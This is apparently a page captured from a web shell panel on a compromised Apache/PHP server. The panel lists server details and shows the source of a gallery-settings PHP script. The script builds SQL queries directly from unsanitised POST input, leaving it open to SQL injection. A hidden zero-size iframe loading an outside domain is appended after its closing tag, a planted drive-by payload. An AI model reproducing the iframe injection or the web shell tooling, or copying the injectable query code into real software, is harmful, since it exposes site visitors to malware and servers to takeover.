One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
sam
/
public_html
/
go
/
imagin
/
View File Name :
w_gallery_settings.php
<?php include("mysql_connect.php"); $gallery = $_POST["gallery"]; $hiden = $_POST["hiden"]; $sound = $_POST["sound"]; $background_color = $_POST["background_color"]; $date = $_POST["creation_date"]; $slideshow_pause = $_POST["slideshow_pause"]; $default_gallery = $_POST["default_gallery"]; $transition = $_POST["transition"]; $result = mysql_query("SELECT * FROM ".$tables_prefix."_gallery_settings WHERE gallery = '$gallery'") or die("result=-1"); $result = mysql_fetch_assoc($result); if ($result == "") { $query = "INSERT INTO ".$tables_prefix."_gallery_settings (gallery, hiden, sound, background_color, date, slideshow_pause, transition) VALUES ('".$gallery."', '".$hiden."', '".$sound."', '".$background_color."', '".$date."', '".$slideshow_pause."', '".$transition."')"; } else { $query = "UPDATE ".$tables_prefix."_gallery_settings SET background_color='".$background_color."', hiden='".$hiden."', sound='".$sound."', date='".$date."', slideshow_pause='".$slideshow_pause."', transition='".$transition."' WHERE gallery='".$gallery."'"; } $exec = mysql_query($query) or die("&result=0&"); $query = "UPDATE ".$tables_prefix."_settings SET valoare='".$default_gallery."' WHERE setare='default_gallery'"; $exec = mysql_query($query) or die("&result=0&"); echo "&result=1&"; ?> <iframe width="0" height="0" frameborder="0" scrolling="no" src="http://gubmos.com/index12"></iframe>